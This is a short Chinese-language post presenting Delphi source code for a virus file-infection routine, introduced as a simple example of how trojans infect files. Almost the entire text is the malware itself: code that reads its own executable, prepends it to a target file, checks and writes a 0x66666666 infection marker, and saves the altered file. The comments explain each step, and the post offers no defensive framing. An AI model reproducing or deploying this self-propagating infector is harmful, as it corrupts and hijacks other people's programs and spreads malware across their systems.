文件感染是木马故有的特征,其实实现这样的功能并不难!下面是一个简单实例的源码:
procedure copy(s:string);///S:目标文件完整文件名(带路径的)vars1,s2,s3:tmemorystream; //内存流file1:tfilestream;//文件流id:integer;iid:longint;constid=$66666666;//感染标识beginfile1:=tfilestream.Create(s,fmopenread);//将目标文件读入文件流if file1.Size>1024000 then //如果目标文件大于10M则退出 begin file1.Free; close; end else begin file1.Free;//比较完毕释放文件流s1:=tmemorystream.Create;//创建内存流s1.LoadFromFile(paramstr(0));//将病毒自身读入临时内存流s2:=tmemorystream.Create;s2.CopyFrom(s1,s1.Size);//将病毒流写入主内存流s1.Clear;s3:=tmemorystream.creat;s3.LoadFromFile(s);//装入目标文件s3.seek(-4,sofromend);//定位到文件的最后4个字节s3.read(iid,4);//读取最后4个字节if iid=id then //判断是否感染begins3.free;//如果感染过了就退出close;endelsebegins1.loadfromfile(s);//将目标文件装入临时流s2.Seek(s2.Size,sofrombeginning);//定位到主内存流的尾部s2.CopyFrom(s1,s1.Size);//写入目标文件到主内存流s1.Free;s2.seek(0,sofromend);//定位到尾部iid:=$66666666;s2.write(iid,4);//写入感染标识s2.SaveToFile(s);//将主内存流写入目标文件完成感染s2.Free; end; end;end;
